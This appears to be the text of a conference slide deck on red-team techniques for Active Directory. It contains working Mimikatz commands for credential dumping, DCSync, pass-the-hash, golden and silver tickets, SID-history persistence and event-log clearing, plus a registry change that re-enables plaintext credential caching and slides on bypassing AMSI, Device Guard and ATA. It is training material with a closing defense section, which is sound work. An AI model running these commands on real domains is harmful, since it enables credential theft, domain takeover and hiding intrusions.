Red Team Techniques
or how to expand your Empire in
Active Directory Environment
Guglielmo Scaiola
MCT – MCSE – CEI – CEH – CHFI – ECSA – GPEN - ISO 27001 L.A. – Security +
mail: gs@miproparma.com
Twitter: @S0ftwarGS
Blog: S0ftwarGS.com

Who am I?
• Security Consultant e Ethical Hacker
• Red Teamer e Penetration Tester
• Microsoft System Engineer – A.D. expert
• Incident Handling & Enterprise Forensics
• Trainer & Speaker
Guglielmo «S0ftwar» Scaiola
MCT – MCSE – CEI – CEH – CHFI – ECSA - GPEN - ISO 27001 L.A. – Security +
mail: gs@miproparma.com Twitter: @S0ftwarGS Blog: S0ftwarGS.com

AGENDA
• Intro
• Red Team Vs. Blue Team
• Red Teaming Infrastructure
• Play the Game
• Defense
• Q & A

Red Teaming: my view
• What is for me?
– Adversary Emulation
– Custom Exploit Dev

Red Team Vs. Blue Team
Red Team & Blue Team Collaboration

Red Teaming Infrastructure
https://posts.specterops.io/designing-effective-covert-red-team-attack-infrastructure-767d4289af43

Are you saying me that exist one tool for automating all of this????

My name is : ...CobaltStrike

Red Team Attack Chain
• Gain Access
– Spear Phishing [Malware (trojan...) / Client Side Exploit]
• Gain Situational Awareness
– Powershell/admin tools & commands
• Escalation
– Local User/Domain User Local Admin with UAC/Domain User
– Local Admin with UAC/Domain User Local Admin Bypass UAC/Domain User
– Local Admin Bypass UAC/Domain User Domain Admin
• Explore Network & Lateral Movement (loop To Situational Awareness)
• Persistence
– Backdoor
• Access & Egress Data
• Extraction

OSINT – (pre – Attack)

Malware Vs. Client Side Exploit
Malware
Pro
• S.O. Agnostic
• Arch Agnostic
Cons
• File
Client Side Exploit
Pro
• Fileless (sure???)
• In-memory
Cons
• Specific for SO/app version

ByPass AV - ByPass Proxy

URL filtering Vs. Domain Fronting
https://www.bamsoftware.com/papers/fronting/
https://github.com/rvrsh3ll/FindFrontableDomains
https://www.youtube.com/watch?v=IKO1ovl7Ky4&t=6s

Gain Situational Awareness

BloodHound

Priv Escalation
Ms16-032
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1

Bypass UAC
https://github.com/hfiref0x/UACME

DEMO TIME

Abuse Terminal Server Session

Ms14-068 kekeo
https://github.com/gentilkiwi/kekeo/releases

Dump plaintext password

Dump plaintext password???

Back to the future
https://www.trustedsec.com/2015/04/dumping-wdigest-creds-with-meterpreter-mimikatzkiwi-in-windows-8-1/
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1

Dump local Hash DB
lsadump::lsa /inject /name:krbtgt
lsadump::lsa
lsadump::lsa /patch

25
DSRM Password
https://technet.microsoft.com/en-us/library/cc732714(v=ws.10).aspx
HKLMSystemCurrentControlSetControlLsaDSRMAdminLogonBehavior

DCSync
DCSync:
1) Discovery DC
2) Query replicate the user cred via GetNCChange
Lsadump::dcsync /domain:child1.newtest.lab /user:child1krbtgt

Mimikatz – over-pass-the-hash
sekurlsa::pth /user:admin2 /domain:child1.newtest.lab /ntlm:a87f3a337d73085c45f9416be5787d86

Silver ticket
Is a TGS: no communication with the DC , but the account computer password is changing every 30 days
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetlogonParametersDisablePasswordChange = 1
kerberos::golden /admin:fakeuser /id:666666 /domain:child1.newtest.lab /sid:S-1-5-21-1286882215-52109606-
1499245918 /target:dc012k12r2.child1.newtest.lab /rc4:84dc6e3f0de5d9788da6529b4f79b2c6 /service:cifs /ptt
ON DC : HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetlogonParametersRefusePasswordChange = 1
HKLMSYSTEMCurrentControlSetServicesNetLogonParametersMaximumPasswordAge

Mimikatz –
Golden Ticket
kerberos::golden /admin:fakeuser /id:666666 /domain:child1.newtest.lab /sid:S-1-5-21-1286882215-52109606-
1499245918 /target:dc012k12r2.child1.newtest.lab /rc4:84dc6e3f0de5d9788da6529b4f79b2c6 /ptt

519:
Active
Directory
Persistence
con SID History
kerberos::golden /admin:fakeuser /id:666666 /domain:child1.newtest.lab /sid:S-1-5-21-1286882215-52109606-1499245918
/target:dc012k12r2.child1.newtest.lab /rc4:84dc6e3f0de5d9788da6529b4f79b2c6 /groups:513,512,520,518 /sids: S-1-5-21-655507452-
925574031-147420587-519 /ptt

Skeleton key
31

Malicious Security Provider
HKLMSystemCurrentControlSetControlLsaSecurity Packages

AdminSDHolder

AdminSDHolder

Process Doppelgänging – a new way to
impersonate a process

Clearing Track with Mimikatz 2.1.1 20171220
• event::drop
• event::clear

Powershell without powershell –
bypass Device Guard

ByPass W10 security enhancement
• AMSI
• Autologging
• Windows Defender SmartScreen
• Device Guard
• Windows Defender Antivirus
• Credential Guard
• Device Guard

LAPS - Local Administrator Password Solution
https://technet.microsoft.com/en-us/mt227395.aspx

LAPS - Get-AdmPwdPassword

The winner is….ATA

Some ATA Bypass Techniques
ATA can’t win if:
• The protocols are correctly implemented
• ATA can’t see how the ticket (or request) are built
• ATA can’t see the traffic with his agents

Bypass 1 - OverPassTheHash
sekurlsa::pth
/user:MyUser /domain:MyDomain
/aes256:aes256 /ntlm:ntlm /aes128:aes128"‘
sekurlsa::pth /user:admin2 /domain:child1.newtest.lab
/ntlm:92937945b518814341de3f726500d4ff
/aes256:cc057a204bb4aad41694a58f495b0834118599d76c7a66b0326cb250a9c46f8f
/aes128:d4a5dd3dce09a0e031c114fdd7e8094c

Bypass 2 – Golden Ticket
kerberos::golden /User:MyUser /domain:MyDomain
/sid:S-1-5-21-3270384115-3177237293-604223748
/aes256:aes256krbtgt /id:1000
/groups:512,513,518,520 /ptt"‘
Golden with AES keys can be generated from any
machine unlike restrictions in case of Over-PTH.

WPC2017 45

DEMO TIME

We must never arrive at
"certain conditions"!
Under certain conditions every
security countermeasure can
by bypassed ... So?

Defense in depth

SIEM, logging e Threat Intelligence

Q & A

Credits
• SpecterOps:@SpecterOps
– Matt Graeber: @mattifestation
– Will Schroeder: @harmj0y
– Raphael Mudge: @ArmitageHacker
– Andrew Robbins: @_wald0
– Matt Nelson: @Enigma0x3
• Benjamin Delphi: @gentilkiwi
• Sean Metcalf: @PyroTek3